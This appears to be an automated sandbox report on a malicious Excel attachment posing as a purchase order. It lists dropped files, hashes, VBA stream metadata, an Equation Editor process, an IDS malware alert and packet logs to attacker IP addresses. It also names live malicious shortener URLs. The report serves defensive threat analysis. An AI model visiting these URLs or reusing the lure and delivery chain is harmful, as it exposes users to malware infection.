                                                  SHA-256:F0D05A03A3F89DF516590EDF8459E7F2193AADC950843F2588E4219E57CD55E3
                                                  SHA-512:171BB7C63B3BB486DB0C2206231112FACCC96466A79865920F1C3C2415B4102AE6B97D3E2EF3C59CCA134517CBB3948415FA23996D965A3A18B717E5E36F089B
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):0.7294183343830343
                                                  Encrypted:false
                                                  SSDEEP:24:7aeSEeD93DS7WEJ3oSYGZnEzkofurju0F/GuguGFhhzoP7o9RIS:7aqeZ3gDJ3oSYcEGu0FxguGFzg7I
                                                  MD5:6BD2FAA735FC7AA162DAD3947E671162
                                                  SHA1:4BB0A43F630C574CC18256CF38577D61C963EA6A
                                                  SHA-256:7BA96E8B0592F4FCBA838941520FFEA88A6B2079DDDF1B47CF20BA4CA0EE2D59
                                                  SHA-512:2FCB5E3C13A15E3EDB482C957E94A75005186419AC5C772A9C64283EC5A43D49463A77B9BF8B4DB71CCF4898C2C27A5A7FD0F46B6490340CFB53997D7C9A9243
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://jiourl.com/GmwgTs>), ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):51
                                                  Entropy (8bit):4.735671665288803
                                                  Encrypted:false
                                                  SSDEEP:3:HRAbABGQYm2fpQX8To9v:HRYFVm4pQXv
                                                  MD5:31A04548F64193AE8C7FC70171E6B9E5
                                                  SHA1:84621289A204589396F32808D197AC437DEBDF0A
                                                  SHA-256:0685EAA839D0FB3EB1E2CE6A6CEDC7726515C4A00A4B89494F7CEE0B12C2D4E6
                                                  SHA-512:02D1391E20FE550A533DE497509EE65DD19F3EA7F3A0FC49AD4F3A78BE14D0956B6DFCEDFB074ECD1C7416950E5558969FFEA6018F4FF862B9873899EC721783
                                                  Malicious:true
                                                  Preview:[InternetShortcut]..URL=https://jiourl.com/GmwgTs..
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Generic INItialization configuration [xls]
                                                  Category:modified
                                                  Size (bytes):120
                                                  Entropy (8bit):4.970007272132442
                                                  Encrypted:false
                                                  SSDEEP:3:bDjxR08TeS5cGyqc+N2mMNGyqc+N2v:bsS5CBQo7BQI
                                                  MD5:CA199E1447EFBBC5CECF7DA6E523CDAA
                                                  SHA1:A35D4881BCD1A8293099690385C7AAC7FF028ED3
                                                  SHA-256:9A744FD6C409CDFB40FF91AC42549B4F74D25B5565D57BCD57D4C5AF8D675FB1
                                                  SHA-512:B38584252684D8686320235FCF91FAF7607F736DC035D6B59014AB8441533B437FCC5EDC8FA7532AFA656036AD89E7FC8E4B039C2B505CC4FC3D4348D0ACFC01
                                                  Malicious:false
                                                  Preview:[folders]..GmwgTs.url=0..jiourl.com.url=0..Mac Purchase Order PO102935.LNK=0..[xls]..Mac Purchase Order PO102935.LNK=0..
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<https://jiourl.com/>), ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):45
                                                  Entropy (8bit):4.519087818311513
                                                  Encrypted:false
                                                  SSDEEP:3:HRAbABGQYm2fpQX8Tzvn:HRYFVm4pQX8vn
                                                  MD5:E05B943319E6F9A1A8E38A44581ED3E4
                                                  SHA1:BD654C9BAB745F39610DF27FB49E65C8156C00AF
                                                  SHA-256:2A86EA0D8D1F77B875CFD9A6CF7A35E1129DC9BF5B944603A145B4172E5578DC
                                                  SHA-512:06CE32E472801575F707F465C32CF69D37763C856E1DB26AECD2EE33BB988C5CB3BC8885A6A93745B2AA13E00D7E5CDDEA2653F8D682D2091314393FA2AABDAB
                                                  Malicious:true
                                                  Preview:[InternetShortcut]..URL=https://jiourl.com/..
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                  MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                  SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                  SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                  SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):72
                                                  Entropy (8bit):4.142768793411737
                                                  Encrypted:false
                                                  SSDEEP:3:X6RRWUv0j8T0cSMPWARqUeMzcg2/:qRRTcsVPWWJcg8
                                                  MD5:42C497CA9D3C44C20FF8F0480E135448
                                                  SHA1:AE4D0C5599B0B23E09ED077F12066FC35D0CE622
                                                  SHA-256:06A293D49B42F97F23A57D3E2056552E31B8F76347BC4A9375AB5872776E8A60
                                                  SHA-512:5A902A1617D0048CB7C30812F355D45F1B90AE4783D4FD46E257D5C0DEE02DC9D93204DE5A87A58A0B45C091B2834EBFEBEA948D630B3FCBB1171A7B47578838
                                                  Malicious:false
                                                  Preview:short_4447.1.jiourl.com/.9729.2325866496.31125424.1918695197.31125422.*.
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):182866
                                                  Entropy (8bit):3.862898281280299
                                                  Encrypted:false
                                                  SSDEEP:3072:B/xKUPE+y6rvwugt5pYGwKAyIxFnQ1IlwJCac29W4QcPnybeNdH+CciTXhMhv:/JPE+TwzAyIxFnQ1IlwJCac29W4Qczdc
                                                  MD5:D1E9E89D71457C35E8A8FF31EADFD642
                                                  SHA1:E2654F19CE0282BDB9FA8F4D10ADACB4ADFDFD87
                                                  SHA-256:5471914F742D78458A2D51C614477F695E79A6ED17156B2D735B7B3BEBCBE7D4
                                                  SHA-512:011F62153D1252ADC1A2793F014541ED8AC7B2753069FA66D809DC11AFAA1B64D768383AD4B3F7C0E97605DD28B2047C00C1AEA2DD8EA561026B8F4C013B73ED
                                                  Malicious:true
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Aug 16 08:33:00 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):462336
                                                  Entropy (8bit):7.974639335817373
                                                  Encrypted:false
                                                  SSDEEP:12288:gWkj9sDorHgvWKX+92iXARJ8gc+CO4rTxUCVH:fkZsDorHgOUHiJT2CVH
                                                  MD5:59FB11A4C98E6F4F34C2F6CB431E76FC
                                                  SHA1:C9F309C5C686BB4CAEE94D96FF4AB7E066756236
                                                  SHA-256:DD687FF7E60CA05778DA53532110C9EABAA3461DA8BC24C210EE64CB14A5DF16
                                                  SHA-512:8D6858B732C59F2486211A76FF01EB22002EE093EF9959EC976838D253D2A5B4609A59816D7AB221AC9D6FE1F4C01E011C3CDC365EF11B31DFB3AC3ABF319A74
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Aug 16 08:33:00 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):462336
                                                  Entropy (8bit):7.974639335817373
                                                  Encrypted:false
                                                  SSDEEP:12288:gWkj9sDorHgvWKX+92iXARJ8gc+CO4rTxUCVH:fkZsDorHgOUHiJT2CVH
                                                  MD5:59FB11A4C98E6F4F34C2F6CB431E76FC
                                                  SHA1:C9F309C5C686BB4CAEE94D96FF4AB7E066756236
                                                  SHA-256:DD687FF7E60CA05778DA53532110C9EABAA3461DA8BC24C210EE64CB14A5DF16
                                                  SHA-512:8D6858B732C59F2486211A76FF01EB22002EE093EF9959EC976838D253D2A5B4609A59816D7AB221AC9D6FE1F4C01E011C3CDC365EF11B31DFB3AC3ABF319A74
                                                  Malicious:true
                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 14 08:47:17 2024, Security: 1
                                                  Entropy (8bit):7.945159130030238
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:Mac Purchase Order PO102935.xls
                                                  File size:455'680 bytes
                                                  MD5:e07cfed85c1ddf5a98b21de6cb894a18
                                                  SHA1:092241ff646b40b753d18973ec61638a0f70fa98
                                                  SHA256:5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553
                                                  SHA512:0016dc6031bc7f82b7d85ccd6d93e7618eb56d4ff5fb08847c73996a61c7a5670786bb689fec14e3ab704070e472ab8f16ed25bd5f428b0ac104e827e712cf68
                                                  SSDEEP:12288:aWkD+1iATCUvwG3Dl6M+ntycfS8ZxGxJygH42DYqI9:dkD+1BCSDinTrZxK4mYqG
                                                  TLSH:C1A4231271D3EF47D99B8831ADC0EADF25A9FD90AE46CA4731A5731E92387F2C831149
                                                  Icon Hash:276ea3a6a6b7bfbf
                                                  Document Type:OLE
                                                  Number of OLE Files:1
                                                  Has Summary Info:
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:True
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:False
                                                  Flash Objects Count:0
                                                  Contains VBA Macros:True
                                                  Code Page:1252
                                                  Author:
                                                  Last Saved By:
                                                  Create Time:2006-09-16 00:00:00
                                                  Last Saved Time:2024-08-14 07:47:17
                                                  Creating Application:Microsoft Excel
                                                  Security:1
                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:786432
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                  VBA File Name:Sheet1.cls
                                                  Stream Size:977
                                                  Attribute VB_Name = "Sheet1"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                  VBA File Name:Sheet2.cls
                                                  Stream Size:977
                                                  Attribute VB_Name = "Sheet2"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                  VBA File Name:Sheet3.cls
                                                  Stream Size:977
                                                  Attribute VB_Name = "Sheet3"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985
                                                  Attribute VB_Name = "ThisWorkbook"
                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.889430592781307
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:200
                                                  Entropy:3.285842543212684
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ? / . . . . . . . . . .
                                                  General
                                                  Stream Path:MBD003C2026/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:99
                                                  Entropy:3.631242196770981
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                  General
                                                  Stream Path:MBD003C2026/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:26744
                                                  Entropy:7.76054332605621
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD003C2027/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:390
                                                  Entropy:6.122537460135232
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . Q y . < { . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . j . i . o . u . r . l . . . c . o . m . / . G . m . w . g . T . s . . . T s r f y = / o . 1 * . z . . . p x Z c s . m h . % . 5 ; . . . . 8 . . 7 . . t . a . Z ^ . . . I . . ) . . ' f ' X I . A t q . . % k . @ . . > ) s . a . . . . 1 1 . K . . . . . . . . . . . . . . . . @ . . . z . i . E . U . h . N . A . P . m . w . 6 . y . s . m . o . D . L . u . A . f . L . k . S . b . W . n . L . 7 . J . 4 . 0 . . . .
                                                  General
                                                  Stream Path:Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:411113
                                                  Entropy:7.999088159611733
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                  CLSID:
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:519
                                                  Entropy:5.284982522646526
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { 2 F 7 F 8 0 C F - B A 8 3 - 4 5 7 6 - 8 F 7 6 - 7 C 1 4 6 5 5 D 2 D 3 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 8 A A 5 B 9 9 5 F 9 9 5 F 9 9 5
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:104
                                                  Entropy:3.0488640812019017
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:2644
                                                  Entropy:3.9980896197861022
                                                  Base64 Encoded:False
                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:553
                                                  Entropy:6.3608798354089116
                                                  Base64 Encoded:True
                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . W h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                  Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                                                  2024-08-16T09:32:48.120716+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49171 | 207.241.232.154 | 192.168.2.22
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Aug 16, 2024 09:32:29.798230886 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798232079 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798243999 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798250914 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798270941 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798273087 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798291922 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798306942 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798306942 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798306942 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798324108 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798331022 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798341990 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798347950 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798361063 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798365116 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798383951 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798398972 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798909903 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798943043 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798959970 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.798960924 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.798979044 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.799004078 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.799021959 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.799037933 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.799053907 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.799066067 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.799072027 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.799091101 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.799091101 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.799091101 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.799108982 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.799129009 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:30.001808882 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:30.006849051 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:30.006881952 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:30.006897926 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:30.006905079 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:30.006932974 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:30.006933928 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:30.182856083 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:30.182909966 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:30.182986975 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:30.187908888 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:30.187946081 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:30.645919085 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:30.646040916 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:30.696911097 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:30.696959972 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:30.697263002 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:30.697318077 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.111711025 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.152539015 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:31.454849958 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:31.454904079 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:31.454988956 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:31.455101967 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.455168009 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.455168009 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.455802917 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.455867052 CEST44349163188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:31.455900908 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.455924988 CEST49163443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.764226913 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.764323950 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:31.764394045 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.764704943 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:31.764740944 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.242420912 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.242561102 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.244142056 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.244213104 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.245306969 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.245327950 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.563693047 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.563744068 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.563822031 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.563926935 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.563927889 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.563927889 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.564013958 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.564013958 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.564052105 CEST44349164188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:32.564110041 CEST49164443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:32.572535992 CEST49165443192.168.2.22188.114.97.3
